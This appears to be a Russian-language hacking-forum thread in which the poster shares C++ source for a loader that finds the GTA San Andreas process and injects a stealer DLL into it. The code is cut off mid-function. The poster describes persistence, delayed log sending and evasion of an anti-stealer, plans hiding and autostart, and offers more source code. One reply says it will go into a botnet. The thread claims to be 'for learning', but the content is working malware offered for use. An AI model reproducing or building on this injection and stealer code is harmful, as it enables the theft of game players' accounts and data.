![]() |
Тема создана в целях познания. Делал чисто из-за того, чтобы получить опыт.
Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер. C++: [CODE] #include #include #include #include #include #include #include #include #include #include #include #include //Library needed by Linker to check file existance #pragma comment(lib, "Shlwapi.lib") #pragma comment(lib, "WinInet.lib") #pragma comment (lib, "urlmon.lib") using namespace std ; DWORD GetProcId ( const wchar_t * procname ) { PROCESSENTRY32 pe ; HANDLE hSnap ; pe . dwSize = sizeof ( PROCESSENTRY32 ) ; hSnap = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS , NULL ) ; if ( Process32First ( hSnap , & pe ) ) { do { if ( wcscmp ( pe . szExeFile , procname ) == 0 ) return pe . th32ProcessID ; ; } while ( Process32Next ( hSnap , & pe ) ) ; } return ( DWORD ) 0 ; } bool InjectDLL ( const int & pid , const string & DLL_Path ) { long dll_size = DLL_Path . length ( ) + 1 ; HANDLE hProc = OpenProcess ( PROCESS_ALL_ACCESS , FALSE , pid ) ; if ( hProc == NULL ) { cerr Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран. P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда? |
Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться. |
Цитата:
|
Нормас, добавлю в свой ботнет :)
|
Цитата:
|
Цитата:
|
Цитата:
|
вирустотал ахуевает от этого?